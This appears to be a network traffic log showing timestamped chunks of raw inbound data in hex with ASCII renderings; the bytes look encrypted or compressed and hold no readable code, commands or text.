                                                                                                                                                2022-09-29 12:51:45 UTC25561INData Raw: f6 ba 74 cb 1a a0 23 71 b5 c5 72 79 d1 85 8c 21 b2 19 6a a1 bc b8 ad 27 40 21 23 e5 16 f7 0f ba 9b 05 2c 6d f3 33 37 67 1b 09 18 f2 79 90 48 c0 e7 2f fd cb 01 6c 55 cc 9e 5e 87 5f ae 3e cc 27 4c 58 4c f1 98 9d d8 a1 8e 8d 51 ed d9 1f d6 6f ad 54 79 b2 1d fe 4d 07 5d 04 81 1c 5e 2e 39 8c 35 1c 49 d0 5c 4d a3 a4 e3 20 3b 53 41 42 f9 9d 35 fc 45 68 40 63 f2 f6 c9 4c 8e dd 17 f7 64 d9 bc db 7d 51 f7 93 8e df 55 12 6b ff b1 30 93 df 73 8f 38 72 7f f7 85 0b ba 49 a0 69 81 36 91 6b 8d e2 62 86 21 7a 14 c5 b7 e2 db ea eb 33 00 13 e1 91 87 aa f8 f8 8e ac d1 a2 d1 16 02 be a1 7b dd 02 ed 71 4d fe 5b 09 9b 7d ef f2 0a 4b a6 ce ea cd be 45 87 3a f5 cf 3a 13 68 7b 76 45 c6 09 a6 dc 9e 20 46 5e 53 f3 6d 70 e7 0d a4 4b 24 6c 8e cb ec dd 72 a2 da ef ad 92 9c 9e 20 4f 39
                                                                                                                                                Data Ascii: t#qry!j'@!#,m37gyH/lU^_>'LXLQoTyM]^.95I\M ;SAB5Eh@cLd}QUk0s8rIi6kb!z3{qM[}KE::h{vE F^SmpK$lr O9
                                                                                                                                                2022-09-29 12:51:45 UTC25577INData Raw: 3c 45 09 c0 be 59 d4 8e 3b e4 78 26 5a 25 a2 bc ae 03 16 31 33 3a 6c 8f 42 a0 92 e7 a4 45 f2 07 a0 ea f9 dd 4f a6 9a 3b 4a 0a e6 56 ab bb 0b 54 ed 9b 51 74 e4 cf 01 97 b5 09 57 f1 91 78 9d 9e 45 db 11 98 80 64 70 1d 77 5f 7e 8e 5d 16 21 7e 64 27 0c 50 14 4a df c9 c4 02 81 9c 25 2e 69 14 cb e1 f4 8c 2a 0e ae 11 8b 5f 98 27 ae 09 65 d8 cb 27 61 80 ee 78 c2 2c b7 ff 7e 2e 51 46 61 83 35 ae 70 66 9f fc 66 75 df c6 ff 9c 74 ef d7 ce 33 f6 41 51 c5 58 c3 bf 14 9b de f7 38 31 aa 01 f0 6a da a8 76 ad 0c 88 27 eb 30 e5 7c 4f 45 f0 cf e6 9d be d3 d0 65 03 f2 32 83 48 10 0f ff 15 38 d8 77 b5 79 44 7b d4 c2 22 bc a0 02 67 bc 1e fa fa 35 5c 38 5d 44 30 4b ce 01 d2 a0 5e 43 cb c8 64 a3 63 06 44 18 c8 81 79 0a 00 b1 9a b7 73 9e 8d 00 6e 7b db e0 8e 8e cc 71 80 55 a5 64
                                                                                                                                                Data Ascii: <EY;x&Z%13:lBEO;JVTQtWxEdpw_~]!~d'PJ%.i*_'e'ax,~.QFa5pffut3AQX81jv'0|OEe2H8wyD{"g5\8]D0K^CdcDysn{qUd
                                                                                                                                                2022-09-29 12:51:45 UTC25593INData Raw: 13 53 80 f6 fc 02 fb 66 79 41 09 a7 8e fd cf f9 d5 92 62 d6 11 d4 cc 17 29 7f 3d 06 36 7b 3c 5a 95 b4 69 5f ea 66 34 1d a0 8a c6 51 c1 7c 2d 1d f7 ac e6 49 c3 e4 b1 4a b8 7c 7d ca 2b 96 72 5a 73 da 99 86 4f b0 0a 15 93 d5 13 ea f5 96 99 ba 25 44 23 17 ad a7 d1 f0 e0 5f c3 97 76 8d 7d 5b 94 f0 87 58 42 c4 77 cf 3e 93 44 30 d4 8f a1 b5 35 0c 43 8e 33 94 62 b4 9a 64 0c 31 6c e7 96 eb b4 08 d7 c4 9a 83 a3 cf 02 b6 80 9f de 5e 29 57 b5 1f fb 19 38 9d 1d 80 fc ff e3 e1 6c 42 6d b8 0a 30 3a fd 4e 1a 0a 49 48 c5 8d 39 73 4d fd 8e 3d 4e a1 cb 46 9f 36 98 e5 1f ba 7d 99 03 14 30 cb 88 44 7d 94 bf 2f 76 26 b4 45 06 85 76 17 7b b2 c0 9b f9 ac 48 ee 0a 9b 6f 84 ab 7f 06 34 71 56 da 29 f8 22 ec a4 ff 47 1a 08 05 ef b3 c3 c2 be b6 c8 5a 73 0d 2f 25 15 2b f3 f9 e3 a5 f2
                                                                                                                                                Data Ascii: SfyAb)=6{<Zi_f4Q|-IJ|}+rZsO%D#_v}[XBw>D05C3bd1l^)W8lBm0:NIH9sM=NF6}0D}/v&Ev{Ho4qV)"GZs/%+
                                                                                                                                                2022-09-29 12:51:45 UTC25609INData Raw: 0b 61 b0 81 88 ba a0 49 17 27 a0 4f 67 b8 58 32 d4 ef 67 bd 13 13 53 0e 67 d5 9c 9c a2 76 4d f1 78 ae a0 9e 3c 14 13 14 92 07 6d b4 77 99 b1 b5 13 c5 fb 70 75 1c ce 57 44 5d 7d 59 4d 59 20 8d 29 7f d6 63 96 48 a8 e2 96 c1 fd 9a 5e 23 21 5b 92 c9 9a 89 60 a7 95 52 1c be 14 09 28 ee c2 52 53 38 8b 2f 08 68 14 ee 3f 0c c6 fe 48 3b f0 da a3 e8 ff a0 11 ae 26 ab 30 a7 44 a0 6b 6a 49 66 88 ff 98 93 53 f1 e3 de 5d 1a 38 32 ce 00 08 4c 56 54 d2 64 cb 5b dc c2 de cc d0 e5 fa e0 67 4e ea 32 49 ea 98 0c 15 7f f3 f7 de fa 02 7c 6f 14 bc 1e 7c e8 5e b2 cb 94 f4 c0 c8 0c 18 fd cd 0b 66 c1 e7 33 bd d5 6b a0 c1 79 03 59 ee 05 72 31 54 e0 f4 d0 91 dc 19 bb 7c 0a 46 35 60 bb a9 b5 41 fc 04 01 a5 cc b1 be b5 57 e1 18 47 75 1f d4 31 a6 af 62 b7 10 44 ca 9a 72 8d 8c 3a 2d 76
                                                                                                                                                Data Ascii: aI'OgX2gSgvMx<mwpuWD]}YMY )cH^#![`R(RS8/h?H;&0DkjIfS]82LVTd[gN2I|o|^f3kyYr1T|F5`AWGu1bDr:-v
                                                                                                                                                2022-09-29 12:51:45 UTC25625INData Raw: 08 5a d3 8e 5a 4d 5b b6 07 ca b2 1c 9f c3 44 26 58 60 04 65 db 1d 05 d5 e4 a5 0d 50 03 87 2a a3 33 eb 0a f9 7f af 55 9c 64 f4 80 87 3d c5 bc 1c 90 43 78 e1 30 b9 6d 9a 53 b1 66 e0 3e 10 01 4f 56 8e 87 f2 69 9c 35 49 9c 7f 21 e2 1e 6b 35 10 86 60 ba 01 21 04 a4 53 cb 32 c3 35 e5 3e 37 ad 25 9a c3 96 98 62 69 51 2e 15 0f 1c 0a 13 ce 7b 7e 47 16 e6 bf 31 6b 13 a1 8f fe b5 7f c5 e9 49 89 05 7f 82 d4 56 47 48 07 8f e6 b8 ec 30 94 98 d5 df 64 0f 5b 9b 9a ef 7b ad 09 05 99 8f 1c bc 3d a2 c5 d0 fd ee 6f 53 53 03 72 14 3c 06 9e f6 5d f8 a4 87 1e fa 32 18 8c c8 79 68 18 46 e3 2e ae 8f d9 24 3e 16 76 67 b4 78 14 f1 83 dd 62 36 2d 7f a7 3d 01 c5 dd 56 3f a8 0a 6c 7c a3 be 72 0b 9e 2e e9 11 61 d9 40 aa e9 37 73 b6 ad 7b f2 1b 19 d2 a6 d8 54 85 b4 5e b9 d5 5d 22 b6 73
                                                                                                                                                Data Ascii: ZZM[D&X`eP*3Ud=Cx0mSf>OVi5I!k5`!S25>7%biQ.{~G1kIVGH0d[{=oSSr<]2yhF.$>vgxb6-=V?l|r.a@7s{T^]"s
                                                                                                                                                2022-09-29 12:51:45 UTC25641INData Raw: 67 45 94 40 50 d9 3a 99 6e ed 57 63 41 d1 8d cc 0d 2e 20 0c 33 f4 82 0a 48 ba 0b df d0 01 ea 3d 69 7f 7f 20 b2 43 a3 d6 12 2e 73 e6 7e 2b d5 1c f9 e9 7f 1b 53 fb 64 5c d0 94 f0 e7 c7 fd f2 ca c1 c2 11 b3 cd 41 31 43 4a 3b 23 de 8b fd 8b 16 88 8e 0e 98 59 9d aa 49 80 97 cf 46 ab 40 84 9c 5f d9 3d 3f a5 cb dc 77 9b 39 07 4b 5a 76 9e 22 44 f8 20 64 77 16 1d 2c 2b 99 84 54 85 6e 19 0b e2 fc b2 9f b1 88 52 87 ee d0 d5 b1 8c 07 ce 36 c5 35 6d 99 c1 02 a6 c0 c6 ec a6 42 36 4b cb e6 57 66 6b 7a fa 7b be 2a 54 77 5d 88 61 e6 12 83 f5 0b 1e 59 66 30 b7 e0 67 05 87 6e 0f ee a6 11 79 4d 63 e1 48 69 af ea 08 3e c4 c5 1c fb 55 cf 88 b8 27 4a 06 7f 36 aa ce df 0e 5e e6 c4 11 ed 10 b3 71 1f c0 76 a2 af a9 15 cf d0 6f b7 2b 52 36 77 ae 8f ab 00 e1 be 11 d6 66 4e 86 1f dc
                                                                                                                                                Data Ascii: gE@P:nWcA. 3H=i C.s~+Sd\A1CJ;#YIF@_=?w9KZv"D dw,+TnR65mB6KWfkz{*Tw]aYf0gnyMcHi>U'J6^qvo+R6wfN
                                                                                                                                                2022-09-29 12:51:45 UTC25657INData Raw: de b0 1a fe 63 c8 e3 60 bc 16 a7 a1 b9 f1 c8 ec 45 8e f6 33 bc 82 a2 0d 6c 76 75 27 8c 58 9b 3c bb b6 0e 6c 66 b7 58 1f 19 01 d4 a4 0b 1e e0 5d d9 47 7c 26 92 ed 7f a0 09 0c a3 f9 7b 6c b2 6c 29 b6 e5 96 46 f0 f7 fb e5 c2 4c aa f7 ae 0e 74 16 ca 80 f8 87 c1 a4 78 fc 92 59 fa 01 ef 04 88 9c 7a 38 61 6a 85 9c 87 81 4e da c4 3b 19 48 3f 3d 36 e7 77 15 7d ac a3 57 1b 1c 8a 18 36 20 c1 e9 6b 65 0c 86 8d d7 ce 5c ac 57 1e 1e 65 e2 2c e3 92 b2 39 6e b8 70 ff 4b 7b 46 00 66 2e 3d ae 70 b9 54 1d 18 90 f5 9f 2a f0 3f c3 7d 2b 58 0c f0 3e aa 83 4b 52 82 70 ec 2c 4f 4a 5b 27 c1 68 fe ca dd 22 57 ca 92 c0 4a a7 1c 25 eb d5 7f 65 ac f1 b7 8f 6f 77 6a 69 1e 77 fe 6b c0 34 85 11 bd 38 57 1d 6f bb 0c 6d 0b ea 34 4d e3 71 d4 4e b3 6b 7f 62 bb fe 16 60 b8 3e d4 4b 6d bf 7f
                                                                                                                                                Data Ascii: c`E3lvu'X<lfX]G|&{ll)FLtxYz8ajN;H?=6w}W6 ke\We,9npK{Ff.=pT*?}+X>KRp,OJ['h"WJ%eowjiwk48Wom4MqNkb`>Km
                                                                                                                                                2022-09-29 12:51:45 UTC25673INData Raw: 70 0e ba af 35 4b 81 57 5c 44 31 72 5d c6 29 1e f3 55 5e ff 0d a1 94 e8 25 1a 6f 7a f2 48 85 42 f0 c9 c9 f1 3d 2a 3f cf 2e 8a 04 42 47 4e ba 3d 9b ea b2 82 b1 f3 32 0f 8a d1 c5 d0 c0 ae 31 cf 4b 0d a7 5b 6d b7 a8 91 c3 79 3f dc 39 e4 6d c7 8a de 21 78 34 a6 0d 31 07 79 49 13 bd bf 13 21 43 4c b3 85 b1 40 6e 30 81 64 0e 66 16 36 d2 37 c3 d3 1c 49 20 b2 1a 2b 36 e7 e4 d5 be 84 5d 51 66 8d 44 68 29 f8 0e 3c 95 3c 5a 40 3d 7d 67 3b 20 c7 3f d3 eb 51 56 21 bd ed 67 a8 dc a5 a5 ca 45 88 db 6d 15 f6 17 1f ab ac b4 cf 61 82 72 75 e0 54 3c ac 2c 4c c2 b1 a6 a8 1a 2e 40 5a 03 b8 b6 88 e2 bd 3e 07 4f 76 5a ea 6e c9 00 f3 e2 c7 32 7b 7c db e8 42 ed ff 09 d9 4a bb 64 ef c1 95 f0 3a 02 fd a5 40 43 a8 62 cb 9d 83 0c fa 33 41 44 29 ef df bf cb 26 96 29 20 b5 e8 8c 0c 4d
                                                                                                                                                Data Ascii: p5KW\D1r])U^%ozHB=*?.BGN=21K[my?9m!x41yI!CL@n0df67I +6]QfDh)<<Z@=}g; ?QV!gEmaruT<,L.@Z>OvZn2{|BJd:@Cb3AD)&) M
                                                                                                                                                2022-09-29 12:51:45 UTC25689INData Raw: c3 d6 62 c0 f6 6c 1b 8c 86 27 af 14 f0 65 f5 7d 19 d8 89 71 ef a7 86 7a 73 98 35 84 06 b8 69 52 d0 d6 b2 58 aa 7a f4 9d 5e 8c b5 8c 8d 4b 01 aa 76 66 9b bd 42 0d b2 a3 10 10 34 fe e5 07 49 29 41 41 82 7a 7e e2 ad d6 ab 5a bf cd 74 63 93 fb 1b c3 8e 4c a0 2c d8 53 27 c7 0b c8 cf 88 c7 66 06 5a 33 cc ca 30 32 d5 c0 6f 63 c9 7f a8 16 34 e8 21 a3 fe 9f 7b c3 9f 35 2b a2 ff 01 49 31 1c 4d 63 64 24 35 af cf 93 fc 41 6b 22 c9 e4 0f dc 14 a6 31 c2 31 1f 85 e0 62 3f 68 c9 72 eb 27 9e d5 07 38 4e ce 0f ba c1 e6 d3 71 bf 12 c1 20 6c 09 0e a1 6c 25 aa 65 04 9a 47 53 da ff 1b 2c c5 f5 b5 87 4c 80 3d 68 0b 9a 04 54 9a ea a5 5e 2f 61 7f 9d 6a c4 f1 bc a4 7c 97 19 d4 0a 18 dd 38 0a 0f f0 cc 85 5e 3f 7b 95 49 9a c6 60 76 70 45 50 0c 4f ca cc ad 94 53 79 a8 0b 6a 4d 1d f1
                                                                                                                                                Data Ascii: bl'e}qzs5iRXz^KvfB4I)AAz~ZtcL,S'fZ302oc4!{5+I1Mcd$5Ak"11b?hr'8Nq ll%eGS,L=hT^/aj|8^?{I`vpEPOSyjM
                                                                                                                                                2022-09-29 12:51:45 UTC25705INData Raw: 7a b9 1b 76 fd 5e 25 af d0 e6 21 55 91 23 d3 51 71 19 29 e2 66 81 41 01 22 72 50 56 c1 33 11 b3 f6 aa 95 b6 bd e0 5e f4 cc 46 64 08 71 b6 3e 92 4e d8 0c b7 17 51 2a b9 db 87 1f d3 b2 5e 5f 9b 02 dc 6d e9 2c 4d a2 50 b7 7f e1 d8 4f ea 4f d7 0c 6a 1a 27 a6 a7 e0 69 d2 d5 51 95 42 a7 33 ca 34 fd 44 ce b9 f8 2b 75 a0 7a 8e a9 f8 4d 01 5e f5 a4 dd 34 c2 35 d3 95 0b 3f a2 32 e2 f0 b9 bf 40 9c 76 b2 28 04 33 09 8e 3e f6 11 bc 7d 9b 17 46 73 2d b9 c0 fb c1 e4 1a c7 4e da db 6d 39 1a ad bd 58 70 ea 4d 6d bb 8d c4 93 df a6 1d 43 2f 2b 2d 2c 1b 7a 0f d2 e8 3e 73 f0 e7 1b 4e bc af 11 f0 ed f6 83 3b 52 2b 90 da eb 4a 26 35 ef 56 53 b3 7c ce a1 e3 ee 0a ec 45 0b aa d0 15 63 33 aa 0f 3f 8f 55 94 5b a0 3e 1b 92 4d 11 0d 64 6a e2 33 e7 79 db d5 d2 e0 3c 7d ef 3a a9 38 83
                                                                                                                                                Data Ascii: zv^%!U#Qq)fA"rPV3^Fdq>NQ*^_m,MPOOj'iQB34D+uzM^45?2@v(3>}Fs-Nm9XpMmC/+-,z>sN;R+J&5VS|Ec3?U[>Mdj3y<}:8
                                                                                                                                                2022-09-29 12:51:45 UTC25721INData Raw: 7c e1 94 a1 ae af 36 64 8d c2 a6 d4 95 3f fe 59 e3 f1 ab 73 36 7d 45 08 74 b9 93 f7 a3 be 10 ec f0 13 a6 a3 65 6e f4 ad 90 80 61 bd d3 fe 15 bc 0c 83 29 25 e3 35 69 3d 2b 82 8d f3 88 57 b8 8d e3 1c 0e 1f bc 9c b4 ca de a6 31 ca 78 c8 ed 25 a7 bb 43 d9 07 bb 49 89 df 75 1f 23 ae 4f ce 0e 05 73 bd e4 a9 25 1d 7f c8 1f 22 e8 13 ba da 1e 86 2f 65 69 01 12 ea fe 48 4c bd 45 3d 26 19 f9 ab b8 49 50 96 09 7d 20 19 27 26 b5 9b 03 51 30 82 81 1b 79 31 bd 33 59 5a fc ca 05 27 00 c6 45 37 49 88 ae 9b 30 c7 28 a0 94 f6 f9 0c f8 a4 09 43 f2 3e 30 c7 63 37 22 75 6d 16 d7 33 42 51 b2 38 9a 82 4b cb db fe 2b 9e 03 8d e6 e2 23 a0 8c 4c 3e 1b 00 ac 50 a3 14 52 2e 93 99 85 bc 41 0d 43 1f 86 3c d6 66 07 e8 db aa 57 aa 52 c2 53 46 bd f4 8d 32 36 dd 13 ca 37 0d 50 bb 18 18 9a
                                                                                                                                                Data Ascii: |6d?Ys6}Etena)%5i=+W1x%CIu#Os%"/eiHLE=&IP} '&Q0y13YZ'E7I0(C>0c7"um3BQ8K+#L>PR.AC<fWRSF267P
                                                                                                                                                2022-09-29 12:51:45 UTC25737INData Raw: 9f a4 4e fe a4 f1 59 20 ac 0c 07 84 36 45 61 31 90 eb 22 87 71 c9 4d ad 66 48 db 89 93 11 0e aa ac 82 b5 c3 8c 83 d4 5a a4 d6 e6 8f ca 4d 7a 51 2f 77 eb 25 bb 86 0a 73 38 e2 c6 6b 7e 1e fb 6b 96 93 a7 69 7c 67 a9 ee 81 10 0d 09 da 39 ab 77 21 0a db 46 9a 2a c8 64 bf d4 75 81 cf 72 23 f8 5d d9 74 67 1c 4f 2e e0 ba 46 37 d8 fe 2a 36 6f e7 21 cd 60 c5 67 51 27 37 94 14 0f b4 c1 e9 48 3c ae c5 c6 6e 0a 3b 10 d5 a7 85 6a c8 eb 19 c4 f5 37 ac 65 81 83 21 df 66 0f 55 cf 8d e8 48 33 b4 d9 a6 85 40 77 04 17 4a 85 dd 08 1f 39 c5 c6 63 a5 8f e4 a3 f4 9b 09 65 a8 d1 e6 cd e6 77 f5 b2 3b 4d 6d 02 44 fe a9 1b d2 a1 1c 82 79 95 9a 22 24 cd e2 d1 c0 19 cd 34 09 1a d7 03 08 a8 b9 bd 69 13 2d 98 ea 53 af 7b 00 16 c4 39 fc ea 06 e5 07 00 c8 1f cb 9e 06 58 29 da 26 fd c6 59
                                                                                                                                                Data Ascii: NY 6Ea1"qMfHZMzQ/w%s8k~ki|g9w!F*dur#]tgO.F7*6o!`gQ'7H<n;j7e!fUH3@wJ9cew;MmDy"$4i-S{9X)&Y
                                                                                                                                                2022-09-29 12:51:45 UTC25753INData Raw: c5 f3 ab 00 54 ed 47 be d7 7a 48 b0 1f ef 64 1f f7 a0 ce 68 bc e0 02 2f 15 c4 44 ef da 4b 4b ad f8 2d fc 17 67 17 36 81 11 3f 6f c4 04 0a 7a 26 84 45 01 99 0d 91 67 b6 6b 99 99 bf 2c ec 27 36 b5 d9 fd e8 60 17 88 b4 35 5e 0b d7 60 cf e6 ee 40 72 2c b2 a1 a9 3d ad 31 87 51 84 8d 18 4d 83 67 a0 eb 40 d5 c9 e7 c1 d1 cb 9b f0 a6 e5 bf 37 fa e6 93 da de cd bf 78 ab c0 d3 d1 06 47 07 dd ad 74 0e 46 7e bc d5 4d 53 79 74 77 62 db be 04 94 6b 2a 3d db 74 91 7c 4f 2e 43 83 e1 a5 31 2f 7d 4c 9a 5e b3 6e ca fb 7d 04 f5 7b e6 de c4 e5 bf 83 d1 75 4b 4b 4d b8 2d db 40 c1 a2 73 d2 7d d5 07 24 c9 88 af 62 24 01 61 e3 b6 c1 62 b2 65 55 9a 61 1d 1c b4 59 51 7a a3 57 8a 1f b9 6b 84 5e 03 5b fb f2 38 83 9f d7 72 e3 06 16 2b 1e 0a 0e 6e 82 8b 8f fd 21 69 16 e9 be 4c d8 c9 3f
                                                                                                                                                Data Ascii: TGzHdh/DKK-g6?oz&Egk,'6`5^`@r,=1QMg@7xGtF~MSytwbk*=t|O.C1/}L^n}{uKKM-@s}$b$abeUaYQzWk^[8r+n!iL?
                                                                                                                                                2022-09-29 12:51:45 UTC25769INData Raw: be fc 46 1e 9a 51 9c 91 81 e0 ad 28 99 19 04 6e b8 ff f2 c4 14 f5 0b a6 10 b1 b9 16 7c 68 25 c6 dd 12 4c d9 2a 3c 15 e9 cd ae e0 bc db 0d 2d 74 c3 f3 9e 63 e4 ca 93 be 54 96 89 3f 30 c7 ea 93 bf de 06 f6 23 44 1f 4e 10 f4 09 ff 89 f9 49 97 0b dc 1c 03 62 b8 cc a6 80 14 7c 84 6e 69 27 dc 4d 42 7a 8e d2 d8 37 7b 50 c0 63 38 f6 15 ee 46 9c 1d 59 2f 8b 59 74 64 19 df 0a 0a 84 ca cf 2f 9a 4f 29 61 5e ae ed 2c 13 f6 41 96 a2 57 a3 84 0a 92 37 93 07 58 cd 82 60 99 09 66 64 61 7f 02 eb 88 c8 fe 4f 95 79 0a 44 c5 18 5e f0 81 fd 2b fc cd f2 77 9f 77 0e 2c 60 15 30 e0 f4 ee 19 25 7a c4 4e 3e a4 4f 91 d0 33 ad 3f f1 ae f2 38 c3 22 6b 1c c0 33 7e 27 99 02 ef 53 18 b2 9a 44 06 da d2 d2 90 74 bb c9 3a 22 3a 5f e1 8e c7 9c f5 3f 06 5b b7 bc dc 62 c9 38 6f 75 21 c5 c0 c9
                                                                                                                                                Data Ascii: FQ(n|h%L*<-tcT?0#DNIb|ni'MBz7{Pc8FY/Ytd/O)a^,AW7X`fdaOyD^+ww,`0%zN>O3?8"k3~'SDt:":_?[b8ou!
                                                                                                                                                2022-09-29 12:51:45 UTC25785INData Raw: 95 72 1a b2 ec 52 6a 04 f0 b8 01 1b 6f 0b 2a ad 0f ef 6f 24 34 17 e4 98 e4 e6 5a 71 57 44 49 01 d0 ab ba c5 a5 a4 cb 57 30 fb 5f 4f 5f 4d ca b9 3a 82 ce ff c8 a2 cd 9c b6 9a 80 40 4e c4 f5 22 1e 46 81 3d 91 96 42 2e a8 28 da 11 52 eb d2 73 02 2a e1 80 d5 c2 bc 3a 86 52 ee 71 57 63 cd 29 f5 2b 08 d3 65 4f f3 82 ff 37 c8 ed d9 ff dc 83 cb 7f fc ba d6 53 67 74 f6 9e 8d 7e 47 d5 d2 a1 a6 c2 b5 0a 0f a1 0f c5 44 2e 6a 9f 37 23 52 57 28 d7 4e f8 00 d9 2f 89 19 dd 64 8c 7d 73 53 24 3b de f3 9d 6b 40 b8 a4 21 0b b9 55 d6 13 35 53 db 60 ff b2 be 33 44 2e c4 de cf 32 9a d0 35 e6 7e 79 3e c9 ca ec 44 48 23 8a 4f ef b5 06 b8 39 96 c9 6f 6f 94 3a 84 b7 1a 6a dd 8a 16 fa 29 c8 fd 59 2a b6 43 ce 14 65 a9 82 f8 44 d0 1f 31 78 25 7b 4e 35 98 ff 16 43 a4 36 08 51 eb cf c2
                                                                                                                                                Data Ascii: rRjo*o$4ZqWDIW0_O_M:@N"F=B.(Rs*:RqWc)+eO7Sgt~GD.j7#RW(N/d}sS$;k@!U5S`3D.25~y>DH#O9oo:j)Y*CeD1x%{N5C6Q
                                                                                                                                                2022-09-29 12:51:45 UTC25801INData Raw: 5b d4 b1 15 99 3e e2 4a 55 d7 3c ea 68 b8 aa b9 e8 49 29 0a 72 4a 11 29 2b 0d c8 f2 21 72 0a 91 71 ca 45 90 ba df dc f7 43 4a d4 29 0b 67 78 ac 51 e8 2c 88 0e 5a 15 51 a6 ca b2 63 9e bb fe 15 b5 98 57 32 a5 c0 60 71 a2 a3 28 7a f7 70 5d ab e0 bd fa a3 22 ce b2 fb 8d 68 c7 a4 2d 85 c9 0f da 01 3e f1 99 89 70 21 83 53 e3 88 be ec 47 2f d4 69 25 bd 5d b2 db 36 4d 6c 7a 20 50 19 e9 e4 4f 9b e2 eb de f4 b3 9a 60 cd c4 47 3d 52 31 07 1f b8 1b e1 ec 49 46 a6 0d 41 be 49 39 dd 72 db a1 77 d8 12 58 25 5b d1 d8 5e 8f 2f 92 d9 f3 4a 3e f3 79 af a8 e1 6e 33 ec 4e 0c 27 84 ad 9a c4 2d b5 6b dc 42 58 eb 8b bc 26 29 b8 e9 fd 10 f5 e4 93 2f 7a 9e 48 5b f3 a6 c7 46 04 e1 0c 8d 3a d1 07 d3 ab 52 ed 17 cb 51 a3 1c a4 d3 a6 0f 46 fc 32 b3 51 39 a1 ce fe 10 f7 fe 4e 42 e8 7b
                                                                                                                                                Data Ascii: [>JU<hI)rJ)+!rqECJ)gxQ,ZQcW2`q(zp]"h->p!SG/i%]6Mlz PO`G=R1IFAI9rwX%[^/J>yn3N'-kBX&)/zH[F:RQF2Q9NB{
                                                                                                                                                2022-09-29 12:51:45 UTC25817INData Raw: ef 2b db ee 52 59 04 70 96 92 bf 63 5d 41 ad c7 5b 68 e0 2e 6e 29 39 e7 33 a7 3c 9f ef 54 5a f7 5d 8a 5f b1 66 b8 3d 68 20 fd d7 40 6f 59 88 36 ae 37 e7 a3 69 46 c1 50 4f 73 f1 fc cb fc 29 d6 8c 70 43 d1 e8 d6 dc 20 e3 b7 ae 89 e2 21 15 10 cc b0 61 c6 5c b4 14 b1 65 f6 07 12 d4 39 b0 c4 dc f0 ae 72 e6 36 53 dc c9 e0 ea 59 ae 34 19 4d 8b 88 2f 83 da a1 98 71 ca ac b9 87 5d 64 0d e8 c5 b4 f6 80 1d 1a 6e 38 11 6c 3c e3 fa 09 3e 9b d2 97 04 e8 65 51 ba 9f a2 d1 13 a3 f4 e5 0f 41 4c 5a 5d 29 f1 cb 20 e5 da 6b 83 fb ed 45 b4 e5 8d 51 67 a3 84 1c aa 7b 38 9a 85 28 9f 76 57 36 04 d7 5b 0a 46 6d fd e4 13 15 fc 90 c2 2b 73 09 12 9e 7b a2 7f 77 b4 20 81 db 52 a6 83 b9 9c 65 c0 f2 c9 1d e6 c9 d8 ba 0c e3 1a 59 7c 04 bd f0 15 8b 78 ed b1 b3 a5 b5 2a 68 ae f4 39 3c 3a
                                                                                                                                                Data Ascii: +RYpc]A[h.n)93<TZ]_f=h @oY67iFPOs)pC !a\e9r6SY4M/q]dn8l<>eQALZ]) kEQg{8(vW6[Fm+s{w ReY|x*h9<:
                                                                                                                                                2022-09-29 12:51:45 UTC25833INData Raw: 4e d0 6c cd ce 9c c9 14 94 53 13 b1 92 87 a9 e8 a9 31 74 15 36 3c 21 bb e4 85 b7 c2 ee 9f 82 40 30 d2 a2 5a 55 be 85 79 df 7c 42 e3 5c 1b 20 f7 6d 11 0d 52 8a 31 1d 65 88 d9 e3 53 f2 d6 de 97 f2 f2 e0 7d 39 f6 12 0f 52 9c 2b 67 c1 a1 b6 98 7e a5 4f 6d af fc 5c c4 6c e1 32 6a 4a 05 75 b6 9b ca 1f a2 d8 39 43 70 11 1a c1 87 18 fa 53 e9 78 d0 34 27 2d 22 58 21 3c 7e 37 91 6f 9b cc 7d b2 0f 78 97 45 32 d0 12 f6 b2 b8 76 1b 6c 06 45 f4 8e cd 2d 0c b2 bd b3 27 04 2f a6 0c 10 5a 7e 6e fe 73 aa 0e 26 8f b2 49 32 81 18 7d fd dc a3 89 85 c2 5a a2 f2 0e 6d bf 42 1f 54 25 1e a9 1e f7 a2 3b 6a e3 9d af fa 50 a2 7d e1 e2 4c 3a c9 82 97 27 54 f9 ec 58 c6 a2 7e c7 7b db c9 8a 01 66 85 1b 88 28 ab 7d a4 94 b9 18 fa 81 9b ff e5 87 76 20 a5 df fc e3 91 c7 bd 12 b0 08 bc d9
                                                                                                                                                Data Ascii: NlS1t6<!@0ZUy|B\ mR1eS}9R+g~Om\l2jJu9CpSx4'-"X!<~7o}xE2vlE-'/Z~ns&I2}ZmBT%;jP}L:'TX~{f(}v
                                                                                                                                                2022-09-29 12:51:45 UTC25849INData Raw: 2d ca cf aa 45 ce ab 34 4b 32 7a 52 cd af bb fa 3f b3 e5 74 2d 55 a4 b1 1e 68 53 ab 73 8b e4 ba 1c f5 f6 87 9c a3 23 86 36 1f 4e 8a ee f4 01 84 45 b7 d1 b7 d6 fd 4d e8 07 e6 0a d3 c5 bd d6 52 dc c3 95 a2 32 56 17 af 1c f4 75 fe 71 a7 d5 1f 44 41 c7 4d 7b 4c 6a 9a e7 b3 bf 59 7b d0 f2 fd 73 60 75 4b a4 90 df 85 29 7d e8 d1 bc fa d4 05 b6 1e 80 ae b5 8a 6b ea ea a2 ca 4d 4f 25 80 79 63 df 36 00 f3 96 c1 b7 d1 b7 2d a9 2d fb e2 5a 94 ef 1b 9d eb e5 3b 9d 37 45 5d dc ee d7 ff 52 6d 25 a1 c5 57 66 d3 bd f8 ab a7 a6 bc 4d c8 41 b8 36 64 5a 5c 48 82 8e bc 36 84 ff f1 6e 5c 64 ed a3 08 cf d5 35 a4 45 64 e3 76 8b ae 38 76 2f df a3 47 4e d6 da 05 6a 04 29 30 f9 f8 78 13 23 70 d7 4e 09 85 6f d1 42 a5 66 48 99 9a 23 41 a0 0d a4 b5 e8 d5 86 cb a6 e9 85 a6 0e 3b 58 c9
                                                                                                                                                Data Ascii: -E4K2zR?t-UhSs#6NEMR2VuqDAM{LjY{s`uK)}kMO%yc6--Z;7E]Rm%WfMA6dZ\H6n\d5Edv8v/GNj)0x#pNoBfH#A;X
